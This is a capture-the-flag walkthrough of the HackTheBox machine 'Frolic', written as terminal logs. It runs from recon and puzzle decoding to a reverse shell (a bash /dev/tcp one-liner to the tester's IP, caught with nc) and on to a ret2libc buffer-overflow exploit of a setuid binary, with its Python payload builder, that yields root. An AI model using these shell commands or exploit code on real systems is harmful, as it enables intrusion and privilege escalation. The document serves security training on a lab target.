frolic

Introduction:
Recon
eneloop@kinetic:.../hackthebox/frolic/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.frolic.htb 10.10.10.111
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 20:48 EST
Nmap scan report for 10.10.10.111
Host is up (0.015s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h40m52s, deviation: 3h10m31s, median: 9m07s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2021-02-23T07:27:40+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-23T01:57:40
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

Enumeration
(py3) eneloop@kinetic:…/zerotrust/content/lab$ smbmap -u guest -H 10.10.10.111
[+] Guest session IP: 10.10.10.111:445 Name: 10.10.10.111
    Disk        Permissions    Comment
    ----        -----------    -------
    print$      NO ACCESS      Printer Drivers
    IPC$        NO ACCESS      IPC Service (frolic server (Samba, Ubuntu))
(py3) eneloop@kinetic:…/zerotrust/content/lab$
http://frolic.htb:9999/backup/password.txt password - imnothuman
http://frolic.htb:9999/backup/user.txt user - admin
Exploitation
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ echo "asdiSIAJJ0QWE9JAS UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA==" | base64 -d
base64: invalid input

The leading token asdiSIAJJ0QWE9JAS is not part of the base64 data, so copy the file and strip it in vi before decoding:

(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cp asdiSIAJJ0QWE9JAS asdiSIAJJ0QWE9JAS.clean
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ vi asdiSIAJJ0QWE9JAS.clean
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean | base64 -d
PK É7M#�[�i index.phpUT �|�[�|�[ux base64: invalid input
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ vi asdiSIAJJ0QWE9JAS.clean
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA==
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean | base64 -d > asdiSIAJJ0QWE9JAS.decoded
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ file asdiSIAJJ0QWE9JAS.decoded
asdiSIAJJ0QWE9JAS.decoded: Zip archive data, at least v2.0 to extract
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ mv asdiSIAJJ0QWE9JAS.decoded asdiSIAJJ0QWE9JAS.zip
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ zipinfo asdiSIAJJ0QWE9JAS.zip
Archive:  asdiSIAJJ0QWE9JAS.zip
Zip file size: 360 bytes, number of entries: 1
-rw-r--r--  3.0 unx      617 TX defN 18-Sep-23 07:44 index.php
1 file, 617 bytes uncompressed, 164 bytes compressed:  73.4%
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ unzip asdiSIAJJ0QWE9JAS.zip
Archive:  asdiSIAJJ0QWE9JAS.zip
[asdiSIAJJ0QWE9JAS.zip] index.php password:
The extracted index.php is a hex string; reversing it with xxd gives another layer of base64:

(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==" | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
(py3) eneloop@kinetic:…/hackthebox/frolic/data$
Feeding the Brainfuck into https://www.dcode.fr/brainfuck-language gives:
idkwhatispass
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat payload.csv
"","test message",admin
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat shell.sh
#! /bin/bash
bash -i >& /dev/tcp/10.10.14.38/4455 0>&1
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.111 - - [27/Feb/2021 09:53:29] "GET /shell.sh HTTP/1.1" 200 -
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.111] 34924
bash: cannot set terminal process group (1217): Inappropriate ioctl for device
bash: no job control in this shell
www-data@frolic:~/html/playsms$
Post-exploit/PrivEsc
www-data@frolic:/home/ayush$ ls
user.txt
www-data@frolic:/home/ayush$ ls -all
total 36
drwxr-xr-x 3 ayush ayush 4096 Sep 25  2018 .
drwxr-xr-x 4 root  root  4096 Sep 23  2018 ..
-rw------- 1 ayush ayush 2781 Sep 25  2018 .bash_history
-rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep 25  2018 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
-rw------- 1 ayush ayush  965 Sep 25  2018 .viminfo
-rwxr-xr-x 1 ayush ayush   33 Sep 25  2018 user.txt
www-data@frolic:/home/ayush$ cd .binary
www-data@frolic:/home/ayush/.binary$ ls -l
total 8
-rwsr-xr-x 1 root root 7480 Sep 25  2018 rop
www-data@frolic:/home/ayush/.binary$
Download the file:
www-data@frolic:/home/ayush/.binary$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.14.38 - - [28/Feb/2021 01:10:55] "GET /rop HTTP/1.1" 200 -
^C

(py3) eneloop@kinetic:…/hackthebox/frolic/data$ wget http://frolic.htb:8000/rop
--2021-02-27 14:31:41--  http://frolic.htb:8000/rop
Resolving frolic.htb (frolic.htb)... 10.10.10.111
Connecting to frolic.htb (frolic.htb)|10.10.10.111|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7480 (7.3K) [application/octet-stream]
Saving to: 'rop'

rop                 100%[===============================================>]   7.30K  --.-KB/s    in 0s

2021-02-27 14:31:41 (222 MB/s) - 'rop' saved [7480/7480]

(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ python -c 'print("A"*100)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ ./rop python -c 'print("A"*100)'
[+] Message sent: python(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ ./rop python -c 'print("A"*100)'
Segmentation fault
(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ gdb rop
GNU gdb (Debian 10.1-1.5) 10.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...
(No debugging symbols found in rop)
gdb-peda$ r Hello World
Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop Hello World
[+] Message sent: Hello[Inferior 1 (process 2850) exited normally]
Warning: not running
gdb-peda$ pattern_create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x79 ('y')
EBX: 0xffffcf80 --> 0x2
ECX: 0x0
EDX: 0x5f ('_')
ESI: 0xf7faf000 --> 0x1e4d6c
EDI: 0xf7faf000 --> 0x1e4d6c
EBP: 0x31414162 ('bAA1')
ESP: 0xffffcf50 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x41474141 ('AAGA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41474141
[------------------------------------stack-------------------------------------]
0000| 0xffffcf50 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xffffcf54 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xffffcf58 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0012| 0xffffcf5c ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0xffffcf60 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0020| 0xffffcf64 ("AA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0xffffcf68 ("AJAAfAA5AAKAAgAA6AAL")
0028| 0xffffcf6c ("fAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41474141 in ?? ()
gdb-peda$
gdb-peda$ pattern_offset 0x41474141
1095188801 found at offset: 52
gdb-peda$ r 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3adc0d3'
Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3adc0d3'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x3c ('<')
EBX: 0xffffcfb0 --> 0x2
ECX: 0x0
EDX: 0x0
ESI: 0xf7faf000 --> 0x1e4d6c
EDI: 0xf7faf000 --> 0x1e4d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffcf80 ("c0d3")
EIP: 0x64613364 ('d3ad')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x64613364
[------------------------------------stack-------------------------------------]
0000| 0xffffcf80 ("c0d3")
0004| 0xffffcf84 --> 0xffffd000 --> 0x0
0008| 0xffffcf88 --> 0xffffd060 --> 0xffffd27b ("SHELL=/bin/bash")
0012| 0xffffcf8c --> 0x8048561 (<__libc_csu_init+33>:	lea    eax,[ebx-0xf8])
0016| 0xffffcf90 --> 0xffffcfb0 --> 0x2
0020| 0xffffcf94 --> 0x0
0024| 0xffffcf98 --> 0x0
0028| 0xffffcf9c --> 0xf7de8e46 (<__libc_start_main+262>:	add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x64613364 in ?? ()
gdb-peda$

EIP now holds 'd3ad' and ESP points at 'c0d3', which confirms the 52-byte offset: the four bytes after the padding become the return address, and the four after that are the first word on the stack when that address executes.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
gdb-peda$
Check whether ASLR is enabled on the target machine:
cat /proc/sys/kernel/randomize_va_space
0
0 means disabled; 1 randomises the stack, mmap and shared-library bases; 2 (the usual default) also randomises the heap. With it off, libc is mapped at the same address on every run, and since NX is enabled the payload will return into libc instead of into shellcode on the stack.
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit
112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
450: 0002edf0 197 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18
558: 000b07c8 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0
616: 00115fa0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0
652: 0002eda0 31 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.10
876: 0002ebf0 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3
1046: 0011fb80 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0
1394: 001b2204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1
1506: 000f3870 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0
1849: 000b07c8 24 FUNC WEAK DEFAULT 13 _Exit@@GLIBC_2.1.1
2108: 001b2154 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0
2263: 0002e9f0 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0
2406: 000f4c80 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2
Prepare the exploit:
www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6| grep /bin/sh
15ba0b /bin/sh
www-data@frolic:/home/ayush/.binary$
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py
import struct
buff = "A" * 52                                 # padding up to the saved return address
libc = 0xb7e19000                               # libc base on the target (ASLR is off)
system = struct.pack('<I', libc + 0x0003ada0)   # system@@GLIBC_2.0
exit = struct.pack('<I', libc + 0x0002e9d0)     # exit@@GLIBC_2.0, returned into after system
binsh = struct.pack('<I', libc + 0x15ba0b)      # "/bin/sh" inside libc

payload = buff + system + exit + binsh
print payload
(py2) eneloop@kinetic:…/hackthebox/frolic/data$
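Putting the three measurements together (crash offset from the peda pattern, symbol offsets from readelf, the /bin/sh offset from strings) is what exploit.py above does by hand. The following is an added example, not the writeup's script: it parses constructed copies of the tool output shown earlier, reuses the writeup's libc base, and rebuilds the same argument, refusing to emit it if any address contains a NUL byte, since an argv-delivered payload is cut short there. The function names are mine.

```python
import struct

# Constructed copies of the tool output shown earlier in this writeup.
PEDA_PATTERN = ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2"
                "AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
READELF_OUT = """\
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
"""
STRINGS_OUT = "15ba0b /bin/sh\n"
LIBC_BASE = 0xB7E19000  # the writeup's base; fixed because randomize_va_space is 0


def crash_offset(pattern: str, eip: int) -> int:
    """Where the four bytes that landed in EIP sit in the pattern (peda pattern_offset)."""
    needle = struct.pack("<I", eip).decode("latin-1")  # little-endian: 0x41474141 -> 'AAGA'
    off = pattern.find(needle)
    if off < 0:
        raise ValueError("EIP value %#x did not come from this pattern" % eip)
    return off


def readelf_symbol(text: str, name: str) -> int:
    """Value column of `readelf -s` for a symbol, ignoring the @GLIBC version suffix."""
    for line in text.splitlines():
        cols = line.split()
        if len(cols) >= 8 and cols[7].split("@")[0] == name:
            return int(cols[1], 16)
    raise KeyError(name)


def strings_offset(text: str, needle: str) -> int:
    """File offset of a string from `strings -atx` output (hex offset, then the string)."""
    for line in text.splitlines():
        off, _, value = line.strip().partition(" ")
        if value == needle:
            return int(off, 16)
    raise KeyError(needle)


def ret2libc_chain(offset: int, base: int, system: int, exit_: int, binsh: int) -> bytes:
    """padding | &system | return address for system (&exit) | &"/bin/sh"."""
    tail = struct.pack("<III", base + system, base + exit_, base + binsh)
    if b"\x00" in tail:
        raise ValueError("NUL byte in an address: an argv-delivered payload is cut there")
    return b"A" * offset + tail


def build_from_outputs() -> bytes:
    off = crash_offset(PEDA_PATTERN, 0x41474141)  # 52, as peda reported
    return ret2libc_chain(off, LIBC_BASE,
                          readelf_symbol(READELF_OUT, "system"),
                          readelf_symbol(READELF_OUT, "exit"),
                          strings_offset(STRINGS_OUT, "/bin/sh"))
```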
Test and Transfer the exploit
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ python ./exploit.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�=��y� J��
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py base64 -w 0
cat: invalid option -- 'w'
Try 'cat --help' for more information.
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py | base64 -w 0
aW1wb3J0IHN0cnVjdApidWZmPSAiQSIgKjUyCmxpYmMgPSAweGI3ZTE5MDAwCnN5c3RlbSA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MDAwM2FkYTApCmV4aXQgPSBzdHJ1Y3QucGFjaygnPEknLGxpYmMgKyAweDAwMDJlOWQwKQpiaW5zaCA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MTViYTBiKQoKcGF5bG9hZD0gYnVmZiArIHN5c3RlbSArIGV4aXQgKyBiaW5zaApwcmludCBwYXlsb2FkCg==

www-data@frolic:/home/ayush/.binary$ echo -n aW1wb3J0IHN0cnVjdApidWZmPSAiQSIgKjUyCmxpYmMgPSAweGI3ZTE5MDAwCnN5c3RlbSA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MDAwM2FkYTApCmV4aXQgPSBzdHJ1Y3QucGFjaygnPEknLGxpYmMgKyAweDAwMDJlOWQwKQpiaW5zaCA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MTViYTBiKQoKcGF5bG9hZD0gYnVmZiArIHN5c3RlbSArIGV4aXQgKyBiaW5zaApwcmludCBwYXlsb2FkCg== | base64 -d > /dev/shm/exploit.py
www-data@frolic:/home/ayush/.binary$ cat /dev/shm/exploit.py
import struct
buff= "A" *52
libc = 0xb7e19000
system = struct.pack('<I',libc + 0x0003ada0)
exit = struct.pack('<I',libc + 0x0002e9d0)
binsh = struct.pack('<I',libc + 0x15ba0b)

payload= buff + system + exit + binsh
print payload
www-data@frolic:/home/ayush/.binary$ ./rop $(python /dev/shm/exploit.py)
cd /root
ls
root.txt
cat root.txt
85XXXXXXXXXXXXXXXX22